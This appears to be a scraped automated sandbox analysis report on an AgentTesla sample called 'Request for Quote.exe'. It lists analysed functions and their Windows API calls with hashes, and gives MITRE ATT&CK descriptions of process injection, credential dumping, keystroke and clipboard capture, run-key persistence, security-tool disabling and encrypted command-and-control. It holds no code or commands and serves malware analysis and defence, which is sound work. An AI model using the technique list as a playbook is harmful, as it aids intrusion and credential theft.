Opcode Fuzzy Hash: cf0c7b5cb95afc24cd66c64d24acbc3f3853ed99df95b431f4ad4093ccaed288
Instruction Fuzzy Hash: 2931A9B4D002589FCB10DFA9D984AEEFBB1BF49314F14842AE414B7240D739A989CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 01577E28, Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 01577ECF

Memory Dump Source

Source File: 0000000E.00000002.344100501.0000000001570000.00000040.00000001.sdmp, Offset: 01570000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: f902647adc9f11ea11aecf0885a8e105941c9f2a5efc45987cde805a8814e113
Instruction ID: 4fe4820ee8862a52df7a1bb69ace59d710118fe776b0467042fc9a6f28733daa
Opcode Fuzzy Hash: f902647adc9f11ea11aecf0885a8e105941c9f2a5efc45987cde805a8814e113
Instruction Fuzzy Hash: 113177B9D042589FCB10CFA9E984ADEFBB0BB19314F14942AE814B7310D775A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 09701490, Relevance: 1.6, APIs: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 09701533

Memory Dump Source

Source File: 0000000E.00000002.352645731.0000000009700000.00000040.00000001.sdmp, Offset: 09700000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: f176f0930acd49b333d3a6f640be321117e4649d7867795920f158de0381e1ca
Instruction ID: 3d4437ba9e8a3c84caaa699cb723eadd1831b77f0965a7f9a6c5b3f6db7cfa2c
Opcode Fuzzy Hash: f176f0930acd49b333d3a6f640be321117e4649d7867795920f158de0381e1ca
Instruction Fuzzy Hash: 02318AB9D05208AFCB10CFA9D484ADEFBF4BB59320F14902AE815BB350D735A945CF65

Uniqueness

Uniqueness Score: -1.00%

Function 09701498, Relevance: 1.6, APIs: 1, Instructions: 85windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 09701533

Memory Dump Source

Source File: 0000000E.00000002.352645731.0000000009700000.00000040.00000001.sdmp, Offset: 09700000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 3903ab4244260232d62d6a146cea6e51b7ef71c1728df7dba762d29a8034745c
Instruction ID: ca68b6206755b1cad0d536509eb38e0e788da3d5e84fd67ca5bc7984cd7f5cff
Opcode Fuzzy Hash: 3903ab4244260232d62d6a146cea6e51b7ef71c1728df7dba762d29a8034745c
Instruction Fuzzy Hash: A33187B9D052089FCB10CFA9D484ADEFBF4AB59310F14902AE815BB310D335A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0967DE58, Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 0967DED6

Memory Dump Source

Source File: 0000000E.00000002.352454779.0000000009670000.00000040.00000001.sdmp, Offset: 09670000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 225f11bb20d784920be0cd5eda80d0cd04924c0238a3c8c80f2f6b412a3c4faf
Instruction ID: ae9e80b7e4778f0da35458f8940d3f8f8474ed87f0913a4e434374c8897be99f
Opcode Fuzzy Hash: 225f11bb20d784920be0cd5eda80d0cd04924c0238a3c8c80f2f6b412a3c4faf
Instruction Fuzzy Hash: 4331CAB4D042189FCF10CFA9D884AEEFBB4AF59314F14842AE814B7340C735A841CFA4

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: Newapp.exe PID: 6108 Parent PID: 996 Newapp.exeCOMMON

Executed Functions

Function 019B6BE3, Relevance: 6.1, APIs: 4, Instructions: 143threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 019B6C70
GetCurrentThread.KERNEL32 ref: 019B6CAD
GetCurrentProcess.KERNEL32 ref: 019B6CEA
GetCurrentThreadId.KERNEL32 ref: 019B6D43

Memory Dump Source

Source File: 00000014.00000002.502425201.00000000019B0000.00000040.00000001.sdmp, Offset: 019B0000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 45dd70af01c120b39a6f80c7d2143cb5fb98f7434846e8d24347e907064816fe
Instruction ID: 08b575feb920f68922210649e8f2d8eb4228fb25ec4df9764d5eccf65aae5cb8
Opcode Fuzzy Hash: 45dd70af01c120b39a6f80c7d2143cb5fb98f7434846e8d24347e907064816fe
Instruction Fuzzy Hash: 795189B0D053858FDB15DFA9CA887DEBFF0EF49314F14849AD549A7291C734A844CB61

Uniqueness

Uniqueness Score: -1.00%

Function 019B6C10, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 019B6C70
GetCurrentThread.KERNEL32 ref: 019B6CAD
GetCurrentProcess.KERNEL32 ref: 019B6CEA
GetCurrentThreadId.KERNEL32 ref: 019B6D43

Memory Dump Source

Source File: 00000014.00000002.502425201.00000000019B0000.00000040.00000001.sdmp, Offset: 019B0000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 6092cba5053bfafa04ec847375e694f36e5641cf3370afda83fe334f9d2642be
Instruction ID: 8f78f64d6b5e361d4170599e07f7a62ead77d191ed7b7722c161f8ea7555eb3d
Opcode Fuzzy Hash: 6092cba5053bfafa04ec847375e694f36e5641cf3370afda83fe334f9d2642be
Instruction Fuzzy Hash: 425143B4D002498FDB14DFAAC688BEEBBF4EF88314F248459E509A7350D734A984CF65

Uniqueness

Uniqueness Score: -1.00%

Function 019B6BDF, Relevance: 6.1, APIs: 4, Instructions: 99threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 019B6C70
GetCurrentThread.KERNEL32 ref: 019B6CAD
GetCurrentProcess.KERNEL32 ref: 019B6CEA
GetCurrentThreadId.KERNEL32 ref: 019B6D43

Memory Dump Source

Source File: 00000014.00000002.502425201.00000000019B0000.00000040.00000001.sdmp, Offset: 019B0000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: c77acbdfa415b2a4b12c1b193ac411b245e82b2c3aaeb1ac4e99064068699925
Instruction ID: c8ae296f27f9c3043802df4e84755ca4308ec188a20e0e182faea12ee2a9781f
Opcode Fuzzy Hash: c77acbdfa415b2a4b12c1b193ac411b245e82b2c3aaeb1ac4e99064068699925
Instruction Fuzzy Hash: 564156B4D002458FEB14DFA9D6887EEBBF0EF98309F248459E609A7350C774A884CF61

Uniqueness

Uniqueness Score: -1.00%

Function 019B5244, Relevance: 1.6, APIs: 1, Instructions: 118COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 019B5362

Memory Dump Source

Source File: 00000014.00000002.502425201.00000000019B0000.00000040.00000001.sdmp, Offset: 019B0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: b4db47f19e92e618fed782d2e531839e13d5e34aee3f54027fb24512d44c16db
Instruction ID: b22e292c82c63f18d23b4ec1d81c4c7a2973227ff2cb66f36511d3089d4ef132
Opcode Fuzzy Hash: b4db47f19e92e618fed782d2e531839e13d5e34aee3f54027fb24512d44c16db
Instruction Fuzzy Hash: A651C0B1D00309DFDB14CFA9C984ADEBFB5BF58310F25852AE819AB210D7759845CF90

Uniqueness

Uniqueness Score: -1.00%

Function 019B5250, Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 019B5362

Memory Dump Source

Source File: 00000014.00000002.502425201.00000000019B0000.00000040.00000001.sdmp, Offset: 019B0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: fdd6791aadac695dee202829735d3da8e091dfafbddef73bcba11c0e13a0f4ca
Instruction ID: 1313b46e63eb39f6c412db48b3052c53bb173bb339751633f417169d1013a953
Opcode Fuzzy Hash: fdd6791aadac695dee202829735d3da8e091dfafbddef73bcba11c0e13a0f4ca
Instruction Fuzzy Hash: 1241CEB1D00348DFEB14CFA9C984ADEBFB5BF58314F25852AE819AB210D7759885CF90

Uniqueness

Uniqueness Score: -1.00%

Function 019B6A24, Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 019B7DC1

Memory Dump Source

Source File: 00000014.00000002.502425201.00000000019B0000.00000040.00000001.sdmp, Offset: 019B0000, based on PE: false

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 41ff768da17b791f960cc01e396f61ba128bedbc7261a4f365d4e67343b5f3c0
Instruction ID: e175af4b44895a402964002b68133ad481e6b95bad4c71053eee92dac5756f23
Opcode Fuzzy Hash: 41ff768da17b791f960cc01e396f61ba128bedbc7261a4f365d4e67343b5f3c0
Instruction Fuzzy Hash: A04138B59003059FDB14CF99C488BAABBF9FF88314F15C959D519AB361D734A841CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 019BC759, Relevance: 1.6, APIs: 1, Instructions: 79COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 019BC7E2

Memory Dump Source

Source File: 00000014.00000002.502425201.00000000019B0000.00000040.00000001.sdmp, Offset: 019B0000, based on PE: false

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: 1fb247541364bf8502da9022e4f1e7e5ad98d86eb3ad0245287cef73455cb86f
Instruction ID: 2f8f5c477a941768a0c6755f10b090f82801dd91b8ae9d647386126b5adfff33
Opcode Fuzzy Hash: 1fb247541364bf8502da9022e4f1e7e5ad98d86eb3ad0245287cef73455cb86f
Instruction Fuzzy Hash: 6C31BE718043498FDB11EFA8DA887DEBFF8EB46324F048069D449E7242C7799805CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 019B6E30, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 019B6EBF

Memory Dump Source

Source File: 00000014.00000002.502425201.00000000019B0000.00000040.00000001.sdmp, Offset: 019B0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: be3915acfa883b706f9e80c2e5284e3b855c062e98b531561a15b9aad3aaa584
Instruction ID: 0e33c6b39f7a4aa2608e07b6dc5b6ac4691120de9f653515ac8e3140a67520a6
Opcode Fuzzy Hash: be3915acfa883b706f9e80c2e5284e3b855c062e98b531561a15b9aad3aaa584
Instruction Fuzzy Hash: 9621E2B59002089FDB10CFA9D984BEEBFF4FB58324F14841AE919A7310D774A955CF61

Uniqueness

Uniqueness Score: -1.00%

Function 019B6E38, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 019B6EBF

Memory Dump Source

Source File: 00000014.00000002.502425201.00000000019B0000.00000040.00000001.sdmp, Offset: 019B0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 50d76c7381a906ed88336461cb46a53800f979ab738bb9da06ba674bb60180b1
Instruction ID: 4a8d2ea195da69d0e34aaba2e2498b1594b2599202c5adacf61c0dee9223734b
Opcode Fuzzy Hash: 50d76c7381a906ed88336461cb46a53800f979ab738bb9da06ba674bb60180b1
Instruction Fuzzy Hash: AA21F3B5900208AFDB10CFA9D984ADEFFF8FB58324F14841AE919A7310D374A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 019BC768, Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 019BC7E2

Memory Dump Source

Source File: 00000014.00000002.502425201.00000000019B0000.00000040.00000001.sdmp, Offset: 019B0000, based on PE: false

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: b1b696f1200eaa510aa7e54f596ba9bd6a6fb7aab2ada0c27cdd3ef035b9b618
Instruction ID: e7ba44b95810bd850287aadbdd4eeeec2a75fe914a1bd72d3c8637602a4d314a
Opcode Fuzzy Hash: b1b696f1200eaa510aa7e54f596ba9bd6a6fb7aab2ada0c27cdd3ef035b9b618
Instruction Fuzzy Hash: 941159719043098FDB10DFA9D6887DEBBF8EB49324F14842AD409A7641D779A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 017AD53C, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.501704828.00000000017AD000.00000040.00000001.sdmp, Offset: 017AD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4463e323f7f71891cab403fc6b7b902941a2e8127ed36573ecc11e79bc1b43e
Instruction ID: 7f85acc6abe92018429d8fc5ae8f785aea11ea7a4a8d465486d1b0ac07573ba8
Opcode Fuzzy Hash: c4463e323f7f71891cab403fc6b7b902941a2e8127ed36573ecc11e79bc1b43e
Instruction Fuzzy Hash: B62145B2504240DFCB25DF94D9C0B26FF61FBC8328F3486A8E9454B606C336D856CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 017BD01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.501802827.00000000017BD000.00000040.00000001.sdmp, Offset: 017BD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51e669c19853f7759ea19c0991fec322b8229ea70bb5b3185fcbbe9a29bf2cb4
Instruction ID: fc34e71dc360fc5fafa5dfc4d606d170825e12a7df634fc8ec23463c5fe1b586
Opcode Fuzzy Hash: 51e669c19853f7759ea19c0991fec322b8229ea70bb5b3185fcbbe9a29bf2cb4
Instruction Fuzzy Hash: E2216771508240DFCB20DFA4D5C0B66FB61FB88358F24C5A9D8094B246C337D807CA61

Uniqueness

Uniqueness Score: -1.00%

Function 017AD537, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.501704828.00000000017AD000.00000040.00000001.sdmp, Offset: 017AD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d64477db9f9483eff024ad21beefddb018fc80a7aa46d68ce26437d5177f2104
Instruction ID: eee9aad1c6f4b402050e56c2b92ac724fcee71eeaf59493680eaac41bf0771a0
Opcode Fuzzy Hash: d64477db9f9483eff024ad21beefddb018fc80a7aa46d68ce26437d5177f2104
Instruction Fuzzy Hash: DB11B176404280CFCB16DF54D5C4B56FF72FB88324F28C6A9D8494B616C336D45ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 017BD017, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.501802827.00000000017BD000.00000040.00000001.sdmp, Offset: 017BD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a673041faea760638411a329164a2550987f39295efeab768d269dd870a3f12
Instruction ID: 2e47a285df6de240ed7f094d04379cb843c9ee41e927247fbfcb01fb9e832e2c
Opcode Fuzzy Hash: 7a673041faea760638411a329164a2550987f39295efeab768d269dd870a3f12
Instruction Fuzzy Hash: 0C11DD75504280CFCB22CF54D5D4B55FFB1FB88328F28C6AAD8094B656C33AD45ACBA2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Request for Quote.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Agenttesla

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre